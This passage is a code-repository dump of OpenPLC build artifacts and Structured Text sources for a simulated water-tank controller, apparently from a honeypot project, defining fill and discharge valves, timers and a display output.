66 | __INIT_VAR(data__->SIMULATION,0,retain)
67 | __INIT_VAR(data__->_TMP_NOT11_OUT,__BOOL_LITERAL(FALSE),retain)
68 | __INIT_VAR(data__->_TMP_AND12_OUT,__BOOL_LITERAL(FALSE),retain)
69 | __INIT_VAR(data__->_TMP_NOT21_OUT,__BOOL_LITERAL(FALSE),retain)
70 | __INIT_VAR(data__->_TMP_AND22_OUT,__BOOL_LITERAL(FALSE),retain)
71 | __INIT_VAR(data__->_TMP_TIME_TO_INT27_OUT,0,retain)
72 | __INIT_VAR(data__->_TMP_TIME_TO_INT28_OUT,0,retain)
73 | __INIT_VAR(data__->_TMP_ADD57_OUT,0,retain)
74 | }
75 |
76 | // Code part
77 | void MAIN_body__(MAIN *data__) {
78 | // Initialise TEMP variables
79 |
80 | __SET_VAR(data__->R_TRIG0.,CLK,,__GET_VAR(data__->I_PBFILL,));
81 | R_TRIG_body__(&data__->R_TRIG0);
82 | __SET_VAR(data__->,_TMP_NOT11_OUT,,!(__GET_VAR(data__->DISCHARGING,)));
83 | __SET_VAR(data__->,_TMP_AND12_OUT,,AND__BOOL__BOOL(
84 | (BOOL)__BOOL_LITERAL(TRUE),
85 | NULL,
86 | (UINT)2,
87 | (BOOL)__GET_VAR(data__->R_TRIG0.Q,),
88 | (BOOL)__GET_VAR(data__->_TMP_NOT11_OUT,)));
89 | __SET_VAR(data__->TON0.,IN,,__GET_VAR(data__->FILLING,));
90 | __SET_VAR(data__->TON0.,PT,,__time_to_timespec(1, 0, 8, 0, 0, 0));
91 | TON_body__(&data__->TON0);
92 | __SET_VAR(data__->RS0.,S,,__GET_VAR(data__->_TMP_AND12_OUT,));
93 | __SET_VAR(data__->RS0.,R1,,__GET_VAR(data__->TON0.Q,));
94 | RS_body__(&data__->RS0);
95 | __SET_VAR(data__->,FILLING,,__GET_VAR(data__->RS0.Q1,));
96 | __SET_VAR(data__->,TIMEFILLING,,__GET_VAR(data__->TON0.ET,));
97 | __SET_VAR(data__->F_TRIG0.,CLK,,__GET_VAR(data__->I_PBDISCHARGE,));
98 | F_TRIG_body__(&data__->F_TRIG0);
99 | __SET_VAR(data__->,_TMP_NOT21_OUT,,!(__GET_VAR(data__->FILLING,)));
100 | __SET_VAR(data__->,_TMP_AND22_OUT,,AND__BOOL__BOOL(
101 | (BOOL)__BOOL_LITERAL(TRUE),
102 | NULL,
103 | (UINT)2,
104 | (BOOL)__GET_VAR(data__->F_TRIG0.Q,),
105 | (BOOL)__GET_VAR(data__->_TMP_NOT21_OUT,)));
106 | __SET_VAR(data__->TON1.,IN,,__GET_VAR(data__->DISCHARGING,));
107 | __SET_VAR(data__->TON1.,PT,,__time_to_timespec(1, 0, 8, 0, 0, 0));
108 | TON_body__(&data__->TON1);
109 | __SET_VAR(data__->RS1.,S,,__GET_VAR(data__->_TMP_AND22_OUT,));
110 | __SET_VAR(data__->RS1.,R1,,__GET_VAR(data__->TON1.Q,));
111 | RS_body__(&data__->RS1);
112 | __SET_VAR(data__->,DISCHARGING,,__GET_VAR(data__->RS1.Q1,));
113 | __SET_VAR(data__->,TIMEDISCHARGING,,__GET_VAR(data__->TON1.ET,));
114 | __SET_VAR(data__->,_TMP_TIME_TO_INT27_OUT,,TIME_TO_INT(
115 | (BOOL)__BOOL_LITERAL(TRUE),
116 | NULL,
117 | (TIME)__GET_VAR(data__->TIMEFILLING,)));
118 | __SET_VAR(data__->,TIMEFILLINGINT,,__GET_VAR(data__->_TMP_TIME_TO_INT27_OUT,));
119 | __SET_VAR(data__->,_TMP_TIME_TO_INT28_OUT,,TIME_TO_INT(
120 | (BOOL)__BOOL_LITERAL(TRUE),
121 | NULL,
122 | (TIME)__GET_VAR(data__->TIMEDISCHARGING,)));
123 | __SET_VAR(data__->,TIMEDISCHARGINGINT,,__GET_VAR(data__->_TMP_TIME_TO_INT28_OUT,));
124 | __SET_VAR(data__->,Q_FILLLIGHT,,__GET_VAR(data__->FILLING,));
125 | __SET_VAR(data__->,Q_FILLVALVE,,__GET_VAR(data__->FILLING,));
126 | __SET_VAR(data__->,Q_LIGHTDISCHARGE,,__GET_VAR(data__->DISCHARGING,));
127 | __SET_VAR(data__->,Q_DISCHARGEVALVE,,__GET_VAR(data__->DISCHARGING,));
128 | __SET_VAR(data__->,_TMP_ADD57_OUT,,ADD__INT__INT(
129 | (BOOL)__BOOL_LITERAL(TRUE),
130 | NULL,
131 | (UINT)2,
132 | (INT)__GET_VAR(data__->TIMEFILLINGINT,),
133 | (INT)__GET_VAR(data__->TIMEDISCHARGINGINT,)));
134 | __SET_VAR(data__->,Q_DISPLAY,,__GET_VAR(data__->_TMP_ADD57_OUT,));
135 |
136 | goto __end;
137 |
138 | __end:
139 | return;
140 | } // MAIN_body__()
141 |
142 |
143 |
144 |
145 |
146 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.h:
--------------------------------------------------------------------------------
1 | #include "beremiz.h"
2 | #ifndef __POUS_H
3 | #define __POUS_H
4 |
5 | #include "accessor.h"
6 | #include "iec_std_lib.h"
7 |
8 | __DECLARE_ENUMERATED_TYPE(LOGLEVEL,
9 | LOGLEVEL__CRITICAL,
10 | LOGLEVEL__WARNING,
11 | LOGLEVEL__INFO,
12 | LOGLEVEL__DEBUG
13 | )
14 | // FUNCTION_BLOCK LOGGER
15 | // Data part
16 | typedef struct {
17 | // FB Interface - IN, OUT, IN_OUT variables
18 | __DECLARE_VAR(BOOL,EN)
19 | __DECLARE_VAR(BOOL,ENO)
20 | __DECLARE_VAR(BOOL,TRIG)
21 | __DECLARE_VAR(STRING,MSG)
22 | __DECLARE_VAR(LOGLEVEL,LEVEL)
23 |
24 | // FB private variables - TEMP, private and located variables
25 | __DECLARE_VAR(BOOL,TRIG0)
26 |
27 | } LOGGER;
28 |
29 | void LOGGER_init__(LOGGER *data__, BOOL retain);
30 | // Code part
31 | void LOGGER_body__(LOGGER *data__);
32 | // PROGRAM MAIN
33 | // Data part
34 | typedef struct {
35 | // PROGRAM Interface - IN, OUT, IN_OUT variables
36 |
37 | // PROGRAM private variables - TEMP, private and located variables
38 | __DECLARE_VAR(BOOL,I_PBFILL)
39 | __DECLARE_VAR(BOOL,I_PBDISCHARGE)
40 | __DECLARE_VAR(BOOL,Q_FILLVALVE)
41 | __DECLARE_VAR(BOOL,Q_FILLLIGHT)
42 | __DECLARE_VAR(BOOL,Q_DISCHARGEVALVE)
43 | __DECLARE_VAR(BOOL,Q_LIGHTDISCHARGE)
44 | __DECLARE_VAR(INT,Q_DISPLAY)
45 | __DECLARE_VAR(BOOL,FILLING)
46 | __DECLARE_VAR(BOOL,DISCHARGING)
47 | __DECLARE_VAR(TIME,TIMEFILLING)
48 | __DECLARE_VAR(INT,TIMEFILLINGINT)
49 | __DECLARE_VAR(TIME,TIMEDISCHARGING)
50 | __DECLARE_VAR(INT,TIMEDISCHARGINGINT)
51 | TON TON0;
52 | RS RS0;
53 | R_TRIG R_TRIG0;
54 | TON TON1;
55 | RS RS1;
56 | F_TRIG F_TRIG0;
57 | __DECLARE_VAR(INT,PLACEHOLDER)
58 | __DECLARE_VAR(INT,SIMULATION)
59 | __DECLARE_VAR(BOOL,_TMP_NOT11_OUT)
60 | __DECLARE_VAR(BOOL,_TMP_AND12_OUT)
61 | __DECLARE_VAR(BOOL,_TMP_NOT21_OUT)
62 | __DECLARE_VAR(BOOL,_TMP_AND22_OUT)
63 | __DECLARE_VAR(INT,_TMP_TIME_TO_INT27_OUT)
64 | __DECLARE_VAR(INT,_TMP_TIME_TO_INT28_OUT)
65 | __DECLARE_VAR(INT,_TMP_ADD57_OUT)
66 |
67 | } MAIN;
68 |
69 | void MAIN_init__(MAIN *data__, BOOL retain);
70 | // Code part
71 | void MAIN_body__(MAIN *data__);
72 | #endif //__POUS_H
73 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/POUS.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/POUS.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Res0.c:
--------------------------------------------------------------------------------
1 | /*******************************************/
2 | /* FILE GENERATED BY iec2c */
3 | /* Editing this file is not recommended... */
4 | /*******************************************/
5 |
6 | #include "iec_std_lib.h"
7 |
8 | // RESOURCE RES0
9 |
10 | extern unsigned long long common_ticktime__;
11 |
12 | #include "accessor.h"
13 | #include "POUS.h"
14 |
15 | #include "Config0.h"
16 |
17 |
18 | BOOL TASK0;
19 | MAIN RES0__INSTANCE0;
20 | #define INSTANCE0 RES0__INSTANCE0
21 |
22 | void RES0_init__(void) {
23 | BOOL retain;
24 | retain = 0;
25 |
26 | TASK0 = __BOOL_LITERAL(FALSE);
27 | MAIN_init__(&INSTANCE0,retain);
28 | }
29 |
30 | void RES0_run__(unsigned long tick) {
31 | TASK0 = !(tick % 1);
32 | if (TASK0) {
33 | MAIN_body__(&INSTANCE0);
34 | }
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Res0.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Res0.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/Scene_3.dynlib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/Scene_3.dynlib
--------------------------------------------------------------------------------
/watertank/openplc-program/build/VARIABLES.csv:
--------------------------------------------------------------------------------
1 | // Programs
2 | 0;CONFIG0.RES0.INSTANCE0;MAIN;
3 |
4 | // Variables
5 | 0;FB;CONFIG0.RES0.INSTANCE0;CONFIG0.RES0.INSTANCE0;MAIN;
6 | 1;VAR;CONFIG0.RES0.INSTANCE0.I_PBFILL;CONFIG0.RES0.INSTANCE0.I_PBFILL;BOOL;
7 | 2;VAR;CONFIG0.RES0.INSTANCE0.I_PBDISCHARGE;CONFIG0.RES0.INSTANCE0.I_PBDISCHARGE;BOOL;
8 | 3;VAR;CONFIG0.RES0.INSTANCE0.Q_FILLVALVE;CONFIG0.RES0.INSTANCE0.Q_FILLVALVE;BOOL;
9 | 4;VAR;CONFIG0.RES0.INSTANCE0.Q_FILLLIGHT;CONFIG0.RES0.INSTANCE0.Q_FILLLIGHT;BOOL;
10 | 5;VAR;CONFIG0.RES0.INSTANCE0.Q_DISCHARGEVALVE;CONFIG0.RES0.INSTANCE0.Q_DISCHARGEVALVE;BOOL;
11 | 6;VAR;CONFIG0.RES0.INSTANCE0.Q_LIGHTDISCHARGE;CONFIG0.RES0.INSTANCE0.Q_LIGHTDISCHARGE;BOOL;
12 | 7;VAR;CONFIG0.RES0.INSTANCE0.Q_DISPLAY;CONFIG0.RES0.INSTANCE0.Q_DISPLAY;INT;
13 | 8;VAR;CONFIG0.RES0.INSTANCE0.FILLING;CONFIG0.RES0.INSTANCE0.FILLING;BOOL;
14 | 9;VAR;CONFIG0.RES0.INSTANCE0.DISCHARGING;CONFIG0.RES0.INSTANCE0.DISCHARGING;BOOL;
15 | 10;VAR;CONFIG0.RES0.INSTANCE0.TIMEFILLING;CONFIG0.RES0.INSTANCE0.TIMEFILLING;TIME;
16 | 11;VAR;CONFIG0.RES0.INSTANCE0.TIMEFILLINGINT;CONFIG0.RES0.INSTANCE0.TIMEFILLINGINT;INT;
17 | 12;VAR;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGING;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGING;TIME;
18 | 13;VAR;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGINGINT;CONFIG0.RES0.INSTANCE0.TIMEDISCHARGINGINT;INT;
19 | 14;FB;CONFIG0.RES0.INSTANCE0.TON0;CONFIG0.RES0.INSTANCE0.TON0;TON;
20 | 15;VAR;CONFIG0.RES0.INSTANCE0.TON0.EN;CONFIG0.RES0.INSTANCE0.TON0.EN;BOOL;
21 | 16;VAR;CONFIG0.RES0.INSTANCE0.TON0.ENO;CONFIG0.RES0.INSTANCE0.TON0.ENO;BOOL;
22 | 17;VAR;CONFIG0.RES0.INSTANCE0.TON0.IN;CONFIG0.RES0.INSTANCE0.TON0.IN;BOOL;
23 | 18;VAR;CONFIG0.RES0.INSTANCE0.TON0.PT;CONFIG0.RES0.INSTANCE0.TON0.PT;TIME;
24 | 19;VAR;CONFIG0.RES0.INSTANCE0.TON0.Q;CONFIG0.RES0.INSTANCE0.TON0.Q;BOOL;
25 | 20;VAR;CONFIG0.RES0.INSTANCE0.TON0.ET;CONFIG0.RES0.INSTANCE0.TON0.ET;TIME;
26 | 21;VAR;CONFIG0.RES0.INSTANCE0.TON0.STATE;CONFIG0.RES0.INSTANCE0.TON0.STATE;SINT;
27 | 22;VAR;CONFIG0.RES0.INSTANCE0.TON0.PREV_IN;CONFIG0.RES0.INSTANCE0.TON0.PREV_IN;BOOL;
28 | 23;VAR;CONFIG0.RES0.INSTANCE0.TON0.CURRENT_TIME;CONFIG0.RES0.INSTANCE0.TON0.CURRENT_TIME;TIME;
29 | 24;VAR;CONFIG0.RES0.INSTANCE0.TON0.START_TIME;CONFIG0.RES0.INSTANCE0.TON0.START_TIME;TIME;
30 | 25;FB;CONFIG0.RES0.INSTANCE0.RS0;CONFIG0.RES0.INSTANCE0.RS0;RS;
31 | 26;VAR;CONFIG0.RES0.INSTANCE0.RS0.EN;CONFIG0.RES0.INSTANCE0.RS0.EN;BOOL;
32 | 27;VAR;CONFIG0.RES0.INSTANCE0.RS0.ENO;CONFIG0.RES0.INSTANCE0.RS0.ENO;BOOL;
33 | 28;VAR;CONFIG0.RES0.INSTANCE0.RS0.S;CONFIG0.RES0.INSTANCE0.RS0.S;BOOL;
34 | 29;VAR;CONFIG0.RES0.INSTANCE0.RS0.R1;CONFIG0.RES0.INSTANCE0.RS0.R1;BOOL;
35 | 30;VAR;CONFIG0.RES0.INSTANCE0.RS0.Q1;CONFIG0.RES0.INSTANCE0.RS0.Q1;BOOL;
36 | 31;FB;CONFIG0.RES0.INSTANCE0.R_TRIG0;CONFIG0.RES0.INSTANCE0.R_TRIG0;R_TRIG;
37 | 32;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.EN;CONFIG0.RES0.INSTANCE0.R_TRIG0.EN;BOOL;
38 | 33;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.ENO;CONFIG0.RES0.INSTANCE0.R_TRIG0.ENO;BOOL;
39 | 34;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.CLK;CONFIG0.RES0.INSTANCE0.R_TRIG0.CLK;BOOL;
40 | 35;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.Q;CONFIG0.RES0.INSTANCE0.R_TRIG0.Q;BOOL;
41 | 36;VAR;CONFIG0.RES0.INSTANCE0.R_TRIG0.M;CONFIG0.RES0.INSTANCE0.R_TRIG0.M;BOOL;
42 | 37;FB;CONFIG0.RES0.INSTANCE0.TON1;CONFIG0.RES0.INSTANCE0.TON1;TON;
43 | 38;VAR;CONFIG0.RES0.INSTANCE0.TON1.EN;CONFIG0.RES0.INSTANCE0.TON1.EN;BOOL;
44 | 39;VAR;CONFIG0.RES0.INSTANCE0.TON1.ENO;CONFIG0.RES0.INSTANCE0.TON1.ENO;BOOL;
45 | 40;VAR;CONFIG0.RES0.INSTANCE0.TON1.IN;CONFIG0.RES0.INSTANCE0.TON1.IN;BOOL;
46 | 41;VAR;CONFIG0.RES0.INSTANCE0.TON1.PT;CONFIG0.RES0.INSTANCE0.TON1.PT;TIME;
47 | 42;VAR;CONFIG0.RES0.INSTANCE0.TON1.Q;CONFIG0.RES0.INSTANCE0.TON1.Q;BOOL;
48 | 43;VAR;CONFIG0.RES0.INSTANCE0.TON1.ET;CONFIG0.RES0.INSTANCE0.TON1.ET;TIME;
49 | 44;VAR;CONFIG0.RES0.INSTANCE0.TON1.STATE;CONFIG0.RES0.INSTANCE0.TON1.STATE;SINT;
50 | 45;VAR;CONFIG0.RES0.INSTANCE0.TON1.PREV_IN;CONFIG0.RES0.INSTANCE0.TON1.PREV_IN;BOOL;
51 | 46;VAR;CONFIG0.RES0.INSTANCE0.TON1.CURRENT_TIME;CONFIG0.RES0.INSTANCE0.TON1.CURRENT_TIME;TIME;
52 | 47;VAR;CONFIG0.RES0.INSTANCE0.TON1.START_TIME;CONFIG0.RES0.INSTANCE0.TON1.START_TIME;TIME;
53 | 48;FB;CONFIG0.RES0.INSTANCE0.RS1;CONFIG0.RES0.INSTANCE0.RS1;RS;
54 | 49;VAR;CONFIG0.RES0.INSTANCE0.RS1.EN;CONFIG0.RES0.INSTANCE0.RS1.EN;BOOL;
55 | 50;VAR;CONFIG0.RES0.INSTANCE0.RS1.ENO;CONFIG0.RES0.INSTANCE0.RS1.ENO;BOOL;
56 | 51;VAR;CONFIG0.RES0.INSTANCE0.RS1.S;CONFIG0.RES0.INSTANCE0.RS1.S;BOOL;
57 | 52;VAR;CONFIG0.RES0.INSTANCE0.RS1.R1;CONFIG0.RES0.INSTANCE0.RS1.R1;BOOL;
58 | 53;VAR;CONFIG0.RES0.INSTANCE0.RS1.Q1;CONFIG0.RES0.INSTANCE0.RS1.Q1;BOOL;
59 | 54;FB;CONFIG0.RES0.INSTANCE0.F_TRIG0;CONFIG0.RES0.INSTANCE0.F_TRIG0;F_TRIG;
60 | 55;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.EN;CONFIG0.RES0.INSTANCE0.F_TRIG0.EN;BOOL;
61 | 56;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.ENO;CONFIG0.RES0.INSTANCE0.F_TRIG0.ENO;BOOL;
62 | 57;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.CLK;CONFIG0.RES0.INSTANCE0.F_TRIG0.CLK;BOOL;
63 | 58;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.Q;CONFIG0.RES0.INSTANCE0.F_TRIG0.Q;BOOL;
64 | 59;VAR;CONFIG0.RES0.INSTANCE0.F_TRIG0.M;CONFIG0.RES0.INSTANCE0.F_TRIG0.M;BOOL;
65 | 60;VAR;CONFIG0.RES0.INSTANCE0.PLACEHOLDER;CONFIG0.RES0.INSTANCE0.PLACEHOLDER;INT;
66 | 61;VAR;CONFIG0.RES0.INSTANCE0.SIMULATION;CONFIG0.RES0.INSTANCE0.SIMULATION;INT;
67 | 62;VAR;CONFIG0.RES0.INSTANCE0._TMP_NOT11_OUT;CONFIG0.RES0.INSTANCE0._TMP_NOT11_OUT;BOOL;
68 | 63;VAR;CONFIG0.RES0.INSTANCE0._TMP_AND12_OUT;CONFIG0.RES0.INSTANCE0._TMP_AND12_OUT;BOOL;
69 | 64;VAR;CONFIG0.RES0.INSTANCE0._TMP_NOT21_OUT;CONFIG0.RES0.INSTANCE0._TMP_NOT21_OUT;BOOL;
70 | 65;VAR;CONFIG0.RES0.INSTANCE0._TMP_AND22_OUT;CONFIG0.RES0.INSTANCE0._TMP_AND22_OUT;BOOL;
71 | 66;VAR;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT27_OUT;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT27_OUT;INT;
72 | 67;VAR;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT28_OUT;CONFIG0.RES0.INSTANCE0._TMP_TIME_TO_INT28_OUT;INT;
73 | 68;VAR;CONFIG0.RES0.INSTANCE0._TMP_ADD57_OUT;CONFIG0.RES0.INSTANCE0._TMP_ADD57_OUT;INT;
74 |
75 |
76 | // Ticktime
77 | 20000000
78 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/beremiz.h:
--------------------------------------------------------------------------------
1 | #ifndef _BEREMIZ_H_
2 | #define _BEREMIZ_H_
3 |
4 | /* Beremiz' header file for use by extensions */
5 |
6 | #include "iec_types.h"
7 |
8 | #define LOG_LEVELS 4
9 | #define LOG_CRITICAL 0
10 | #define LOG_WARNING 1
11 | #define LOG_INFO 2
12 | #define LOG_DEBUG 3
13 |
14 | extern unsigned long long common_ticktime__;
15 |
16 | #ifdef TARGET_LOGGING_DISABLE
17 | static inline int LogMessage(uint8_t level, char* buf, uint32_t size)
18 | {
19 | (void)level;
20 | (void)buf;
21 | (void)size;
22 | return 0;
23 | }
24 | #else
25 | int LogMessage(uint8_t level, char* buf, uint32_t size);
26 | #endif
27 |
28 | long AtomicCompareExchange(long* atomicvar,long compared, long exchange);
29 | void *create_RT_to_nRT_signal(char* name);
30 | void delete_RT_to_nRT_signal(void* handle);
31 | int wait_RT_to_nRT_signal(void* handle);
32 | int unblock_RT_to_nRT_signal(void* handle);
33 | void nRT_reschedule(void);
34 |
35 | #endif
36 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/generated_plc.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/lastbuildPLC.md5:
--------------------------------------------------------------------------------
1 | 9d5bc8d40946e8ca2f232284604ad72c
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc.st:
--------------------------------------------------------------------------------
1 | TYPE
2 | LOGLEVEL : (CRITICAL, WARNING, INFO, DEBUG) := INFO;
3 | END_TYPE
4 |
5 | FUNCTION_BLOCK LOGGER
6 | VAR_INPUT
7 | TRIG : BOOL;
8 | MSG : STRING;
9 | LEVEL : LOGLEVEL := INFO;
10 | END_VAR
11 | VAR
12 | TRIG0 : BOOL;
13 | END_VAR
14 |
15 | IF TRIG AND NOT TRIG0 THEN
16 | {{
17 | LogMessage(GetFbVar(LEVEL),(char*)GetFbVar(MSG, .body),GetFbVar(MSG, .len));
18 | }}
19 | END_IF;
20 | TRIG0:=TRIG;
21 | END_FUNCTION_BLOCK
22 |
23 |
24 | PROGRAM Main
25 | VAR
26 | I_PbFill : BOOL;
27 | I_PbDischarge : BOOL := True;
28 | Q_FillValve : BOOL;
29 | Q_FillLight : BOOL;
30 | Q_DischargeValve : BOOL;
31 | Q_LightDischarge : BOOL;
32 | Q_Display : INT;
33 | END_VAR
34 | VAR
35 | Filling : BOOL;
36 | Discharging : BOOL;
37 | TimeFilling : TIME;
38 | TimeFillingInt : INT;
39 | TimeDischarging : TIME;
40 | TimeDischargingInt : INT;
41 | TON0 : TON;
42 | RS0 : RS;
43 | R_TRIG0 : R_TRIG;
44 | TON1 : TON;
45 | RS1 : RS;
46 | F_TRIG0 : F_TRIG;
47 | Placeholder : INT;
48 | END_VAR
49 | VAR
50 | Simulation : INT;
51 | END_VAR
52 | VAR
53 | _TMP_NOT11_OUT : BOOL;
54 | _TMP_AND12_OUT : BOOL;
55 | _TMP_NOT21_OUT : BOOL;
56 | _TMP_AND22_OUT : BOOL;
57 | _TMP_TIME_TO_INT27_OUT : INT;
58 | _TMP_TIME_TO_INT28_OUT : INT;
59 | _TMP_ADD57_OUT : INT;
60 | END_VAR
61 |
62 | R_TRIG0(CLK := I_PbFill);
63 | _TMP_NOT11_OUT := NOT(Discharging);
64 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
65 | TON0(IN := Filling, PT := T#8s);
66 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
67 | Filling := RS0.Q1;
68 | TimeFilling := TON0.ET;
69 | F_TRIG0(CLK := I_PbDischarge);
70 | _TMP_NOT21_OUT := NOT(Filling);
71 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
72 | TON1(IN := Discharging, PT := T#8s);
73 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
74 | Discharging := RS1.Q1;
75 | TimeDischarging := TON1.ET;
76 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
77 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
78 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
79 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
80 | Q_FillLight := Filling;
81 | Q_FillValve := Filling;
82 | Q_LightDischarge := Discharging;
83 | Q_DischargeValve := Discharging;
84 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
85 | Q_Display := _TMP_ADD57_OUT;
86 | END_PROGRAM
87 |
88 |
89 | CONFIGURATION Config0
90 |
91 | RESOURCE Res0 ON PLC
92 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
93 | PROGRAM instance0 WITH task0 : Main;
94 | END_RESOURCE
95 | END_CONFIGURATION
96 |
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc_debugger.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/plc_debugger.o
--------------------------------------------------------------------------------
/watertank/openplc-program/build/plc_main.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xnkc/virtuepot/02888a2bc9be662f339d1e90796c80113eed48be/watertank/openplc-program/build/plc_main.o
--------------------------------------------------------------------------------
/watertank/openplc-program/watertank.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
